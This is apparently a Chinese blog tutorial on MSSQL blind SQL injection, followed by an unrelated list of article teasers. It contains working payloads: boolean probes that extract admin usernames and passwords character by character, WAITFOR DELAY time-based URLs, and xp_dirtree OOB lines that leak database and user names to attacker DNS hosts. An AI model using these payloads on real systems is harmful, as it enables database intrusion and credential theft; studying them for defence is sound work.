丶ershiyi
丶ershiyi

MSSQL之盲注

目录:

  • 布尔盲注
    • 第一步 判断注入
    • 第二步 猜解列数
    • 第三步 猜数据库名,表名:
    • 第四步 猜解字段
    • 第五步 判断字段长度
    • 第六步 猜解字段内容
  • 时间盲注
    • 利用条件
    • 注入语句
  • OOB 注入
    • 利用条件
    • 原理
    • 检测
    • 利用/渗出

布尔盲注

总结
布尔盲注就是靠逐个猜测与尝试弱口令的的方法,有报错的就是猜错了,没报错就对了。

第一步 判断注入

  • and 1=1

  • and 1=2

第二步 猜解列数

  • order by 1 #返回正确

  • order by 2 #返回正确

  • order by 3 #抛出错误

第三步 猜数据库名,表名:

  • and (select count(*) from sysobjects)>0 #确定SQLSERVER数据库

  • and (select count(*) from manage)>0 #确定数据表

  • and (select count(*) from manage)=1,2,3,4,5 #确定长度

第四步 猜解字段

  • and exists(select username from manage),#返回正常,字段名正确

  • and exists(select password from manage), #返回正常,字段名正确

第五步 判断字段长度

  • and exists(select id from manage where ID=1) #判断ID=1是否存在

  • and exists(select id from manage where len(username)=1 and ID=1)
    #猜解username字段长度,依次尝试

  • and exists(select id from manage where len(username)=8 and ID=1),
    #username#字段长度为8

  • and exists(select id from manage where len(password)=1 and ID=1),
    #猜解password字段长度

  • and exists(select id from manage where len(password)=16 and ID=1),
    #password字段长度为16

第六步 猜解字段内容

  • and exists (select id from manage where - unicode(substring(username,1,1))=65 and ID=1)
    #得出数字,然后对照unicode编码表进行破解

MSSQL之盲注_第1张图片

时间盲注

利用条件

能用堆叠,利用 waitfor delay ‘*’ 延时

注入语句

例:

  • http://127.0.0.1/1.aspx?id=1;if(ascii(substring((select user),1,1)))=100 WAITFOR DELAY ‘0:0:5’
    #判断用户的第一个字母ascii码是否为100,是就延时五秒

  • http://192.168.130.137/1.aspx?id=1;if(select IS_SRVROLEMEMBER(‘sysadmin’))=1 WAITFOR DELAY ‘0:0:5’
    #看下当前角色是否为数据库管理员,是就延时五秒

  • http://192.168.130.137/1.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY ‘0:0:5’
    #判断数据库名字

OOB 注入

利用条件

  1. 必须堆叠

  2. 必须sa

原理

  • 是用 xp_subdirs ,xp_dirtree, xp_fileexist, xp_fileexists,xp_getfiledetails,sp_add_jobstep 等方法创建DNS查询,读取smb共享域名。

  • 也有用 OpenRowset()OpenDatasource() 的办法,这两个函数为远程加载其他mssql数据库,默认关闭。

    declare @host varchar(1024);

    select @host=convert(varchar(1024),db_name())+’.vj0r9q.dnslog.cn’;

    exec(‘master…xp_subdirs "\\’+@host+’"’);

  • 或者

    exec(‘master…xp_dirtree "\\’+@host+’"’);

    exec(‘master…xp_fileexist "\\’+@host+’\test"’);

检测

受害者

EXEC master…xp_dirtree ‘\\oob.dnsattacker.com \’ –

MSSQL之盲注_第2张图片

利用/渗出

受害者

DECLARE @data varchar (1024 ); SELECT @data = (SELECT system_user ); EXEC(‘master…xp_dirtree "\\’+@data+’.oob.dnsattacker.com\foo$"’);

MSSQL之盲注_第3张图片

你可能感兴趣的:(漏洞利用,MSSQL,注入,盲注)

  • 数据库原理与技术(专升本)-含答案 海海不掉头发 每天学习一点点笔记all专升本数据库练习题sqlserver经验分享
    《数据库原理与技术》课程复习资料一、名词解释:数据管理DBDBMSDBSRDBMSDBAORDBMSSQL关系关系模型关系系统完整性控制属性2NF候选码二、单项选择题:1,任何由二个属性组成的关系可能是A.INFB.2NFC.3NFD.不能判定2.数据冗余引起的问题主要是花费A.时间B.空间C.时间与空间D.时间或空间3.在数据库中,存储冗余数据是A.不应该的B.应该且合理的C.合理的但不能过度冗
  • 【网络安全】如何预防xss 不会代码的小徐 web安全xss安全
    XSS(Cross-SiteScripting,跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本,使其在用户浏览器中执行,从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了,为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起,浏览器无法分辨它们的可信度,最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码,它们
  • 华为云发布《云原生2.0架构白皮书》,GaussDB技术再升级 是怼怼呀11 云原生数据库
    近期,在华为伙伴暨开发者大会2022,华为云CTO张宇昕发布了《云原生2.0架构白皮书》,包括云原生数据库在内,介绍了云原生2.0的关键特征、架构模式,以及优秀实践,为企业数字化升级注入了云原生2.0新动力。华为云数据库首席架构师冯柯也在会上分享了云原生数据库HTAP重大特性商用,通过极致混合负载能力和及时精准的数据分析,助力企业商业决策。华为云CTO张宇昕在会上发表云原生2.0重要演讲云原生数据
  • ASP.NET Core 入门教学十六 防止常见的Web攻击 充值内卷 asp.net前端后端
    在ASP.NETCore中,防止常见的Web攻击是非常重要的,以确保应用程序的安全性。以下是一些常见的Web攻击类型及其防范措施:1.跨站脚本攻击(XSS)跨站脚本攻击(XSS)是一种通过在网页中注入恶意脚本来攻击用户的浏览器的技术。为了防止XSS攻击,可以采取以下措施:输入验证:对用户输入进行严格的验证和清理。输出编码:在将用户输入的数据插入到HTML页面中时,进行适当的编码。ASP.NETCo
  • 感恩日记25天 王琦_9cdb
    感谢自己一天的劳作,疲惫又真实。处理家里大大小小的事情,今日事,今日毕,明天又是清爽的一天。感谢先生和我一起做了美味的饭菜,一家人吃的很愉快。感谢爸爸大热天,帮我送菡去上课外班。感谢书城古筝的负责人,贴心的上门帮忙换琴弦,免去了我们的辛苦。感谢社区组织的星巴克参观,小朋友对咖啡有了一点新的认识。我可以把将心注入拿给她看了。感谢破冰这个电视剧,孔先生看的愉快。感谢学校的安排,带老大处理牙齿的窝沟封闭
  • spring如何解决bean的循环依赖 fantasyYan2 springspringjava后端
    通过三级缓存解决循环依赖问题。其中一级缓存用于存储完整的bean;二级缓存用于存储已经完成aop动态代理的bean,防止重复创建动态代理;三级缓存存储未实现aop动态代理和为实现依赖注入的bean。getBean()时先从一级缓存取,没有取二级,最后取三级。举个例子:A依赖B,B依赖A。首先创建A发现缓存中没有A,如图实例化A,然后发现A依赖B,把A放入三级缓存。开始创建B,发现B不在缓存中,实例
  • VitePress 布局插槽使用指南 软考鸭 vitepressvitepress博客
    VitePress是一款基于Vite和Vue3的静态网站生成器,专为文档编写而设计。VitePress的默认主题提供了丰富的布局插槽,允许开发者在页面的特定位置注入自定义内容。本文将详细介绍如何使用这些布局插槽来自定义VitePress站点。一、布局插槽概述VitePress的组件内置了多个插槽,这些插槽允许你在页面的不同区域插入自定义组件或内容。通过利用这些插槽,你可以轻松实现页面布局的个性化定
  • 使用 Flutter 实现 MVVM 架构 陆业聪 flutter架构
    文章目录一、什么是MVVM架构?二、MVVM架构设计三、代码案例3.1Model3.2ViewModel3.3View四、扩展MVVM架构4.1引入服务层4.2使用依赖注入4.3状态管理4.4遵循最佳实践五、实战案例:待办事项应用5.1Model5.2服务层5.3ViewModel5.4View六、使用Riverpod库实现一个基于MVVM架构的计数器应用6.1Model6.2ViewModel6
  • 2024年认证杯数学建模C题思路+模型+代码 灿灿数模分号 数学建模
    C题云中的海盐巴黎气候协定提出的目标是:在2100年前,把全球平均气温相对于工业革命以前的气温升幅控制在不超过2摄氏度的水平,并为1.5摄氏度而努力。但事实上,许多之前的研究已经指出,全球的碳排放以及气温升温的前景都无法达到这一预期标准。而且传统的减排措施的实施效果较为有限。为了应对全球变暖,一些科学家提出了叫做“地球工程”的改造手段。包括使用人工手段从空气中分离并储存二氧化碳,或者给大气中注入气
  • Mybatis 防止sql注入 Ferrari1001
    SQL****注入是一种代码注入技术,用于攻击数据驱动的应用,恶意的****SQL****语句被插入到执行的实体字段中(例如,为了转储数据库内容给攻击者)。[摘自]SQLinjection-WikipediaSQL****注入,大家都不陌生,是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段(例如“or‘1’=’1’”这样的语句),有可能入侵参数检验不足的应用程序。所以
  • sql注入常用函数 web安全工具库 小课堂sql注入常用函数
    当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。----网易云热评一、MySql注入常用函数1、system_user()系统用户名2、user()用户名3、current_user()当前用户名4、session_user()链接数据库的用户名5、database()数据库名6、version()数据库版本7、@@datadir数据库路径8、@@basedir数据
  • 后端怎么处理前端传入的参数应该做哪些处理? dyjs.akcnzssa.s. javaweb前端状态模式
    我们需要对传来的参数做什么处理?1.规则校验(哪些参数必须传入,哪些参数不能一起使用,哪些参数不能传入,等等)2.对字符串类型的参数做trim处理注意,接收前端参数的实体类不会为null,即使你未传入任何参数,通常情况下,SpringMVC会在请求处理时创建一个新的AesBusAesMappingDTO实例,并将其注入到queryDataMapping方法中。因此,在正常的请求处理流程中,aesB
  • spring用@Autowired注入map出现的问题 错对对 springjavabeanspringbootmybatis
    最近做项目,无意间用到了spring注入集合的问题,具体问题如下:在spring配置文件中配置map如下:image.png在项目中使用map如下:@AutowiredprivateMaphandlerMap;奇怪的是,当我使用handlerMap.get("async")获取处理类时,获取不到具体的bean,这是怎么回事呢?问题可能出现的原因:1、map的key值被覆盖,xml配置不起作用2、注
  • @PostConstruct和@PreDestroy注解失效以及@Resource注入结果为NULL 决影 JAVA已排查问题小计springjavabug
    项目场景:刚开始学习spring啊,就这两个问题排查了大半天,最后才找到了解决办法问题描述:以@PostConstruct和@PreDestroy注解的初始化方法和销毁方法失效,注解的两个方法都不会被执行。值得注意的是@PreDestroy注解的销毁方法还可能受到注解@Scope("singleton")的影响。在作用域中默认是singleton单例的,此时销毁方法会被执行。若参数为其他则会试情况
  • 【spring】依赖注入之@Resource注入 程序java圈 springspringjava后端
    @Resource注入本文源码基于spring-framework-5.3.10。源码位置:org.springframework.context.annotation.CommonAnnotationBeanPostProcessor.postProcessProperties(PropertyValues,Object,String)除了指定BeanName的Bean在注入的时候会进行ByTy
  • 敏感信息泄露总结_rabbitmq漏洞 2301_82056337 rabbitmq分布式
    /env获取全部环境属性,数据库账户密码泄露,可获取mysql,managodb数据库的用户名和密码/configprops描述配置属性(包含默认值)如何注入Bean/dump获取线程活动的快照/health报告应用程序的健康指标,这些值由HealthIndicator的实现类提供,git项目地址泄露,可获取git项目的地址/info获取应用程序的定制信息,这些信息由info打头的属性提供/map
  • spring使用@Resource 注入map Java知识技术分享 spring技术springjava后端
    spring使用@Resource注入map注入多个Service:/***单笔付款状态MQ消费**@authorzkg*@since2024-09-0616:11:19*/@Slf4j@Component@RocketMQMessageListener(topic=PayGlobalConstants.PAY_APPL_SINGLE_TOPIC,consumerGroup=PayGlobalCo
  • 详解神策数据银行对公业务数字化运营解决方案 汪功校 大数据
    4.0时代,数字银行的转变主要体现在系统支持、数据管理、客户感知三个维度,希望通过改善业务体系、整合业务数据,从而为客户提供更好的服务。当前,多数银行已经拥有了较好的数据基础,但却并没有形成数据全生命周期的闭环,导致价值化数据占比较低,无法作为关键生产要素为企业注入新动能。在此背景下,数据全生命周期的闭环体系成为银行数字化运营的引擎,发挥数据中台和业务中台相辅相成、相互支撑的作用,构建以客户数据为
  • 财富水池助你轻松理财 Shirley赖
    一,树立正确的理财观。理财不是要去挤成为百万富翁,千万富翁甚至亿万富翁的独木桥,而是要以终为始,明白自己想要过什么样的生活,需要实现什么目标并通过理财去实现它们的过程。二,通过财富水池打理好自己的财富。财富水池的理财模型可以帮助我们很好地梳理和打理好财富。它的运作如下:财富通过我们的收入源源不断地注入财富水池,分别注满水池里的现金池,保险池,目标池和金鹅池,然后通过支出流出水池。我们的主要任务就是
  • 杨柳依依 紫竹别苑
    风中杨柳“昔我往矣,杨柳依依;今我来思,雨雪霏霏”《诗经·小雅·采薇》的这两句,那依依的杨柳,绵绵的细雨总会轻柔地拂过心田,滋润出无限的诗情。在我们校园西边大路上有两排垂柳,是枝叶发黄的那种,每到春天,一树一树的鹅黄,总是最先向人们发出春信。给走过漫漫长冬的人心里注入一丝温暖。清明节前后,随着折柳的习俗,或长或短或粗或细的柳哨声就会从孩童们的口中响起,虽单调却不失生机,处于梦幻年龄的孩子,把柳树的
  • python自动化笔记:操作mysql数据库 zhoukeguai python自动化笔记数据库python自动化
    操作mysql数据库常见方法1、第三方库:pymysql1.1、安装pymysql1.2、连接数据库1.3、连接指定数据库1.4创建数据库、创建表1.5、表中插入数据1.6、批量插入数据1.7、获取查询结果数据1.8、防sql注入,sql语句中一般用占位符传值2、标准库:mysql.connector2.1、安装mysql-connector2.2、操作方法1、第三方库:pymysql1.1、安装
  • 好好学习——9 小墨鱼天天很开心
    一切从“为什么”开始在看韩剧或者日剧时,每当有吃饭场景出现时,我们会感觉他们吃饭特别香,这是为什么呢?原因很简单,他们为吃饭的过程注入了仪式感。不管是吃正餐还是便当,他们都会有一定的仪式。也许他们这个才是真正的在吃饭,享受吃饭的过程,而我们每天的吃饭不过是在进食。做任何事情时,我们都是理所当然的直接去做,然后理所当然的认为我们会得到自己想要的结果。很少会去想怎样去做好一件事,只是单纯的凭直觉去做事
  • 习惯在Java使用Spring Boot,转golang之后,也可以简单又高效的开发高性能的web服务 zhuyasen springbootgolangginrestful
    如果你是一个Java开发者,你可能已经习惯了使用SpringBoot这个强大的框架来开发web服务。SpringBoot提供了很多便利的功能,如自动配置、依赖注入、安全管理、监控等,让你可以快速地构建和部署web应用。但是,如果你想尝试转向golang时,你会发现有很多的挑战和困难。golang是一种编译型的语言,它有着不同的语法、类型系统、并发模型、错误处理等,你需要花费很多时间和精力来学习和适
  • 【无标题】XSS安全防护:responseBody (输入流可重复读) 配置 syfjava RuoYi-Vue-Plus学习RuoYi-Vue-Plus
    接上文:配置XSS过滤器XXS安全防护:拦截器+注解实现校验-CSDN博客XSS(跨站脚本)攻击是一种网络安全威胁,允许攻击者注入恶意脚本到看似安全的网站。当用户浏览这些被注入恶意代码的网页时,恶意脚本会在用户的浏览器环境中执行,这可能导致多种安全问题,如窃取敏感数据、劫持用户会话等。这些攻击利用了应用程序对用户输入处理不当的问题。预防方法包括输入验证、输出编码等。https://blog.csd
  • Node.js 入门:中间件与安全性深度解析 Switch616 前端node.js中间件chrome服务器架构前端前端框架
    Node.js入门:中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录:认证流程与实践️权限管理:安全访问控制详解️安全性防止SQL注入:参数化查询与ORM的最佳实践防止XSS攻击:用户输入处理与安全防护使用HTTPS和SSL/TLS:加密传输与数据安全⚠️错误处理️全局错误处理:确保应用稳定性的关键异常捕获与日志记录:有效排查问题的核心认证与授权使用
  • Vue 3 中 provide 和 inject 高级用法与最佳实践 暖阳浅笑-嘿 vue.js前端javascript
    《Vue3中provide和inject高级用法与最佳实践》一、基本概念二、高级用法(一)提供函数(二)响应式数据(三)多值提供三、最佳实践(一)封装通用服务(二)避免过度依赖(三)命名规范(四)结合Vuex四、实际应用场景(一)主题切换(二)国际化(三)全局配置五、注意事项(一)数据变更通知(二)依赖注入的层次(三)测试在Vue3的开发中,provide和inject是一对强大的功能,用于实现组
  • 我沐浴讲台上的阳光——献给教师节 黄静 皖南医学院
    身材无需伟岸但精神必须富有他站在三尺讲台上已显出巍峨如山的状态他不是伟人一点也不伟大甚至个头还很矮小模样很平凡、很普通但,他额角像岩石头发像波浪衣襟像篷帆每天一轮希望的太阳升起在他的左肩降落在他的右肩一群鸟儿般机灵的孩子歌唱在他的身后飞翔在他的眼前他的两只眼睛:一只属于智慧一只属于温泉生活则终身依偎着他一天又一天,一年又一年晶莹成知识的元素要为那些求知欲渴的学子注入长流不息的精神乳汁我望着讲台上的
  • SQL注入漏洞检测 Kali与编程~ sql网络安全
    预计更新SQL注入概述1.1SQL注入攻击概述1.2SQL注入漏洞分类1.3SQL注入攻击的危害SQLMap介绍2.1SQLMap简介2.2SQLMap安装与配置2.3SQLMap基本用法SQLMap进阶使用3.1SQLMap高级用法3.2SQLMap配置文件详解3.3SQLMap插件的使用SQL注入漏洞检测4.1SQL注入漏洞检测基础4.2SQL注入漏洞检测工具4.3SQL注入漏洞检测实战SQL
  • sql注入漏洞 mineflame_ sql
    所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入
  • 为什么有些公司禁止在 SpringBoot 中使用 @Autowired 注解 程序员小2 java数据库开发语言
    插:AI时代,程序员或多或少要了解些人工智能,前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家(前言–人工智能教程)坚持不懈,越努力越幸运,大家一起学习鸭~~~Spring官方已不推荐使用Autowired字段/属性注入bean,一些大公司的新项目也明令禁止使用了。说明最近公司升级框架,由原来的springframework3.0升级到5.0,然后写代码的时候突然发
  • 如何用ruby来写hadoop的mapreduce并生成jar包 wudixiaotie mapreduce
    ruby来写hadoop的mapreduce,我用的方法是rubydoop。怎么配置环境呢: 1.安装rvm:     不说了 网上有 2.安装ruby:     由于我以前是做ruby的,所以习惯性的先安装了ruby,起码调试起来比jruby快多了。 3.安装jruby:     rvm install jruby然后等待安
  • java编程思想 -- 访问控制权限 百合不是茶 java访问控制权限单例模式
    访问权限是java中一个比较中要的知识点,它规定者什么方法可以访问,什么不可以访问   一:包访问权限;   自定义包: package com.wj.control; //包 public class Demo { //定义一个无参的方法 public void DemoPackage(){ System.out.println("调用
  • [生物与医学]请审慎食用小龙虾 comsci 生物
         现在的餐馆里面出售的小龙虾,有一些是在野外捕捉的,这些小龙虾身体里面可能带有某些病毒和细菌,人食用以后可能会导致一些疾病,严重的甚至会死亡.....      所以,参加聚餐的时候,最好不要点小龙虾...就吃养殖的猪肉,牛肉,羊肉和鱼,等动物蛋白质     
  • org.apache.jasper.JasperException: Unable to compile class for JSP: 商人shang maven2.2jdk1.8
    环境: jdk1.8    maven  tomcat7-maven-plugin  2.0 原因: tomcat7-maven-plugin  2.0 不知吃 jdk 1.8,换成 tomcat7-maven-plugin  2.2就行,即     <plugin>
  • 你的垃圾你处理掉了吗?GC oloz GC
    前序:本人菜鸟,此文研究学习来自网络,各位牛牛多指教  1.垃圾收集算法的核心思想   Java语言建立了垃圾收集机制,用以跟踪正在使用的对象和发现并回收不再使用(引用)的对象。该机制可以有效防范动态内存分配中可能发生的两个危险:因内存垃圾过多而引发的内存耗尽,以及不恰当的内存释放所造成的内存非法引用。   垃圾收集算法的核心思想是:对虚拟机可用内存空间,即堆空间中的对象进行识别
  • shiro 和 SESSSION 杨白白 shiro
    shiro 在web项目里默认使用的是web容器提供的session,也就是说shiro使用的session是web容器产生的,并不是自己产生的,在用于非web环境时可用其他来源代替。在web工程启动的时候它就和容器绑定在了一起,这是通过web.xml里面的shiroFilter实现的。通过session.getSession()方法会在浏览器cokkice产生JESSIONID,当关闭浏览器,此
  • 移动互联网终端 淘宝客如何实现盈利 小桔子 移動客戶端淘客淘寶App
           2012年淘宝联盟平台为站长和淘宝客带来的分成收入突破30亿元,同比增长100%。而来自移动端的分成达1亿元,其中美丽说、蘑菇街、果库、口袋购物等App运营商分成近5000万元。 可以看出,虽然目前阶段PC端对于淘客而言仍旧是盈利的大头,但移动端已经呈现出爆发之势。而且这个势头将随着智能终端(手机,平板)的加速普及而更加迅猛
  • wordpress小工具制作 aichenglong wordpress小工具
    wordpress 使用侧边栏的小工具,很方便调整页面结构 小工具的制作过程 1 在自己的主题文件中新建一个文件夹(如widget),在文件夹中创建一个php(AWP_posts-category.php) 小工具是一个类,想侧边栏一样,还得使用代码注册,他才可以再后台使用,基本的代码一层不变 <?php class AWP_Post_Category extends WP_Wi
  • JS微信分享 AILIKES js
    // 所有功能必须包含在 WeixinApi.ready 中进行    WeixinApi.ready(function(Api) {        // 微信分享的数据            var wxData = {       &nb
  • 封装探讨 百合不是茶 JAVA面向对象 封装
    //封装   属性 方法 将某些东西包装在一起,通过创建对象或使用静态的方法来调用,称为封装;封装其实就是有选择性地公开或隐藏某些信息,它解决了数据的安全性问题,增加代码的可读性和可维护性   在 Aname类中申明三个属性,将其封装在一个类中:通过对象来调用   例如   1: //属性 将其设为私有 姓名 name 可以公开
  • jquery radio/checkbox change事件不能触发的问题 bijian1013 JavaScriptjquery
    我想让radio来控制当前我选择的是机动车还是特种车,如下所示:  <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"><
  • AngularJS中安全性措施 bijian1013 JavaScriptAngularJS安全性XSRFJSON漏洞
            在使用web应用中,安全性是应该首要考虑的一个问题。AngularJS提供了一些辅助机制,用来防护来自两个常见攻击方向的网络攻击。 一.JSON漏洞         当使用一个GET请求获取JSON数组信息的时候(尤其是当这一信息非常敏感,
  • [Maven学习笔记九]Maven发布web项目 bit1129 maven
    基于Maven的web项目的标准项目结构 user-project     user-core     user-service     user-web        src      
  • 【Hive七】Hive用户自定义聚合函数(UDAF) bit1129 hive
    用户自定义聚合函数,用户提供的多个入参通过聚合计算(求和、求最大值、求最小值)得到一个聚合计算结果的函数。 问题:UDF也可以提供输入多个参数然后输出一个结果的运算,比如加法运算add(3,5),add这个UDF需要实现UDF的evaluate方法,那么UDF和UDAF的实质分别究竟是什么?   Double evaluate(Double a, Double b)  
  • 通过 nginx-lua 给 Nginx 增加 OAuth 支持 ronin47
    前言:我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算,阅读下面的文档,实现自动化并获得收益。SeatGeek 在过去几年中取得了发展,我们已经积累了不少针对各种任务的不同管理接口。我们通常为新的展示需求创建新模块,比如我们自己的博客、图表等。我们还定期开发内部工具来处理诸如部署、可视化操作及事件处理等事务。在处理这些事务中,我们使用了几个不同的接口来认证: &n
  • 利用tomcat-redis-session-manager做session同步时自定义类对象属性保存不上的解决方法 bsr1983 session
    在利用tomcat-redis-session-manager做session同步时,遇到了在session保存一个自定义对象时,修改该对象中的某个属性,session未进行序列化,属性没有被存储到redis中。 在 tomcat-redis-session-manager的github上有如下说明: Session Change Tracking As noted in the &qu
  • 《代码大全》表驱动法-Table Driven Approach-1 bylijinnan java算法
    关于Table Driven Approach的一篇非常好的文章: http://www.codeproject.com/Articles/42732/Table-driven-Approach package com.ljn.base; import java.util.Random; public class TableDriven { public
  • Sybase封锁原理 chicony Sybase
           昨天在操作Sybase IQ12.7时意外操作造成了数据库表锁定,不能删除被锁定表数据也不能往其中写入数据。由于着急往该表抽入数据,因此立马着手解决该表的解锁问题。     无奈此前没有接触过Sybase IQ12.7这套数据库产品,加之当时已属于下班时间无法求助于支持人员支持,因此只有借助搜索引擎强大的
  • java异常处理机制 CrazyMizzz java
    java异常关键字有以下几个,分别为 try catch final throw throws 他们的定义分别为 try:    Opening exception-handling statement. catch:  Captures the exception. finally: Runs its code before terminating
  • hive 数据插入DML语法汇总 daizj hiveDML数据插入
    Hive的数据插入DML语法汇总1、Loading files into tables语法:1) LOAD DATA [LOCAL] INPATH 'filepath' [OVERWRITE] INTO TABLE tablename [PARTITION (partcol1=val1, partcol2=val2 ...)]解释:1)、上面命令执行环境为hive客户端环境下: hive>l
  • 工厂设计模式 dcj3sjt126com 设计模式
      使用设计模式是促进最佳实践和良好设计的好办法。设计模式可以提供针对常见的编程问题的灵活的解决方案。 工厂模式 工厂模式(Factory)允许你在代码执行时实例化对象。它之所以被称为工厂模式是因为它负责“生产”对象。工厂方法的参数是你要生成的对象对应的类名称。 Example #1 调用工厂方法(带参数) <?phpclass Example{ 
  • mysql字符串查找函数 dcj3sjt126com mysql
      FIND_IN_SET(str,strlist) 假如字符串str 在由N 子链组成的字符串列表strlist 中,则返回值的范围在1到 N 之间。一个字符串列表就是一个由一些被‘,’符号分开的自链组成的字符串。如果第一个参数是一个常数字符串,而第二个是type SET列,则   FIND_IN_SET() 函数被优化,使用比特计算。如果str不在strlist 或st
  • jvm内存管理 easterfly jvm
    一、JVM堆内存的划分 分为年轻代和年老代。年轻代又分为三部分:一个eden,两个survivor。 工作过程是这样的:e区空间满了后,执行minor gc,存活下来的对象放入s0, 对s0仍会进行minor gc,存活下来的的对象放入s1中,对s1同样执行minor gc,依旧存活的对象就放入年老代中; 年老代满了之后会执行major gc,这个是stop the word模式,执行
  • CentOS-6.3安装配置JDK-8 gengzg centos
    JAVA_HOME=/usr/java/jdk1.8.0_45 JRE_HOME=/usr/java/jdk1.8.0_45/jre PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib export JAVA_HOME
  • 【转】关于web路径的获取方法 huangyc1210 Web路径
    假定你的web application 名称为news,你在浏览器中输入请求路径:  http://localhost:8080/news/main/list.jsp  则执行下面向行代码后打印出如下结果:  1、 System.out.println(request.getContextPath()); //可返回站点的根路径。也就是项
  • php里获取第一个中文首字母并排序 远去的渡口 数据结构PHP
    很久没来更新博客了,还是觉得工作需要多总结的好。今天来更新一个自己认为比较有成就的问题吧。 最近在做储值结算,需求里结算首页需要按门店的首字母A-Z排序。我的数据结构原本是这样的: Array ( [0] => Array ( [sid] => 2885842 [recetcstoredpay] =&g
  • java内部类 hm4123660 java内部类匿名内部类成员内部类方法内部类
          在Java中,可以将一个类定义在另一个类里面或者一个方法里面,这样的类称为内部类。内部类仍然是一个独立的类,在编译之后内部类会被编译成独立的.class文件,但是前面冠以外部类的类名和$符号。内部类可以间接解决多继承问题,可以使用内部类继承一个类,外部类继承一个类,实现多继承。      &nb
  • Caused by: java.lang.IncompatibleClassChangeError: class org.hibernate.cfg.Exten zhb8015
    maven pom.xml关于hibernate的配置和异常信息如下,查了好多资料,问题还是没有解决。只知道是包冲突,就是不知道是哪个包....遇到这个问题的分享下是怎么解决的。。   maven pom:   <dependency> <groupId>org.hibernate</groupId> <ar
  • Spark 性能相关参数配置详解-任务调度篇 Stark_Summer sparkcachecpu任务调度yarn
    随着Spark的逐渐成熟完善, 越来越多的可配置参数被添加到Spark中来, 本文试图通过阐述这其中部分参数的工作原理和配置思路, 和大家一起探讨一下如何根据实际场合对Spark进行配置优化。   由于篇幅较长,所以在这里分篇组织,如果要看最新完整的网页版内容,可以戳这里:http://spark-config.readthedocs.org/,主要是便
  • css3滤镜 wangkeheng htmlcss
    经常看到一些网站的底部有一些灰色的图标,鼠标移入的时候会变亮,开始以为是js操作src或者bg呢,搜索了一下,发现了一个更好的方法:通过css3的滤镜方法。 html代码: <a href='' class='icon'><img src='utv.jpg' /></a> css代码: .icon{-webkit-filter: graysc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他